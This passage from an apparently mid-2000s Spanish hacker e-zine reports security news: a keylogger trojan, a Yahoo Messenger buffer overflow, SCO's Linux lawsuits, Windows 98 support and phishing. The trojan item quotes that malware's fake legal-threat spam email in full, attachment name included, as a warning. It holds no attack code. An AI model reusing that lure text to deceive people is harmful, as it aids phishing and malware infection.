nia de 14 aos y seducir por Internet a otras nias menores de edad. Pero no solo esto, si no, que le
prohben utilizar Internet y telfono mvil por 5 aos.
Esperamos que se siga adelante con estas investigaciones para castigar a los pederastas y as aplicar
mano dura, no podemos dejar que estos locos toquen a menores y mantengan relaciones, es por eso que
apoyamos firmemente la decisin del juez y esperamos que se hagan leyes ms fuertes contra este tipo
de situaciones.

Troj/Sefex.B. Se hace con todo lo del teclad o en IE


Este troyano se ha reproducido y enviado masivamente a miles de ordenadores utilizando el conocido
spam.
Se aprovecha de dos fallas que tiene el navegador del to Bill, son fallos crticos y a su vez, al no tener
el IE actualizado, uno pude quedar infectado. El atacante se aprovecha de cdigo HTML malicioso para
infectar a los usuarios...
El troyano llega a las victimas en correo con un archivo adjunto compreso en .ZIP
Podemos ver que llega con estas caractersticas:
Archivo adjunto: goldbank_cc.zip (11,553 bytes)
De: "office" <[email protected]>
Asunto: It in your interests
Texto del mensaje:
You use illegal software!
We hereby inform you that your computer was
scanned under the IP 195.125.66.216. The contents
of your computer were confiscated as an evidence,
and you will be indicated.
If you recognize the fault - look attachment for
the further your actions.
We'll contact you later.
[email protected]
Si nos infecta, lo que har este troyano ser capturar todo lo que escribimos, desde ya contraseas, y
copiarse con los nombres docs2.html- goldbank_cc.html
Para mas informacin visiten http://www.vsantivirus.com/

Impotan t e agujero de segurid a d en Yahoo Messe n g e r


Se ha detectado una falla de seguridad en las versiones 5.6.0.1351 y anteriores de Yahoo Messenger, la
cual permite a un intruso ejecutar cdigo arbitrario.
El problema se encuentra en un desbordamiento del buffer, lo cual se provoca cuando un usuario recibe
un archivo con un nombre demasiado largo.
El intruso podr ejecutar cdigo y tener los mismos privilegios que el usuario del sistema, por lo que se
considera un fallo critico.
Todos los usuarios que tengan las versiones afectadas por este fallo, la nica manera de cerrarlo es
instalar la nueva versin que es 5.6.0.1358

SCO, ataca a usarios del siste m a operativo linux


La compaa SCO quiere demandar a usuarios que usan linux, hace poco demanda ron a IBM por
utilizar parte del cdigo UNIX en el ncleo de linux, por eso SCO esta pidiendo una suma de dinero a
usuarios, empresas y dems entidades, aunque IBM ya se esta preparando para defender a los
usuarios de linux se piensa que el primero en ser demandado sea Linus Trovalds, en fin todos quieren
ganar dinero haciendo de las suyas.

Windo ws 98 no muere y sigu e dand o fallas hasta el 2006


Hasta hace poco se pensaba que Windows 98 morira dentro de poco, pero no fue as, un total giro por
parte de Microsoft decide seguir adelante con Windows 98 y su soporte tcnico hasta el 2006.
Supuestamente el 16 de enero del 2004 era la fecha de exterminacin del soporte a Windows 98, 98SE
y ME.
Seguramente se dieron cuenta de que muchos usuarios tienen instalado este sistema operativo y si lo
sacan del mercado tendran problemas, aunque mas de los que tienen no creo que asuste a los usuarios
de Windows, se seguirn dando parches y aplicaciones, as que no se emocionen aun, que hasta el 2006
seguiremos conviviendo con ventanas 98, espero que Microsoft y sus secuaces caigan antes del 2006. /*
Agregado en la edicin: es el profundo deseo de CDT :D */
Como ven, Microsoft da la posibilidad de adquirir patente a mitad de precio y dems hardware para
que los usuarios de Windows 98 se pasen a XP.

Fraud e s bancarios de moda


ltimamente se ha dado la moda de engaar a usuarios que tengan cuentas bancarias, mediante el
correo electrnico.
En si, la tcnica se denomina phishing. Se envan mails a personas pidindoles datos confidenciales, lo
ms factible es que los usuarios insensatos den sus nmeros de tarjetas (cc), es mas, muchos de ellos ya
cayeron en este engao, el texto que proviene desde el banco, pero que fue escrito por los delincuentes,
es ingenioso y los usuarios caen fcil, en fin esto es lo que se dio en el ultimo tiempo y no creo que
finalice.
Ya me despido, estas fueron algunas noticias interesantes aunque han quedado muchas sin nombran
creo que tuvieron suficiente y ahora a esperar hasta la prxima E-Zine.
Despedi d a
Por: Editor CDT

Y llego la hora de decir adis xDD.


Bueno no nos podemos despedir sin antes decir un par de palabras. Damos las gracias a todas las
personas que da a da confan en nosotros como grupo y personalmente, damos las gracias a grupos de
seguridad y de laboratorios como Vulnfact, Raza Mexicana y toda la gente en general que nunca se deja
estar y siempre busca el mas all, el traspasa r una barrera puesta por los dems y que siempre se
pueden romper.
Hoy terminamos nuestra cuarta edicin y nuestra tarea, mente y espritu nos dice que debemos ir por
la quinta e ir cumpliendo tambin con todos los proyectos que tenemos en mente, para ustedes y
nosotros.
Espero hallan disfrutado de este numero y hasta la prxima.

Cultura Digital Team // El tiempo no se detiene, CDT sigue dando que hablar y activo seores...

También podría gustarte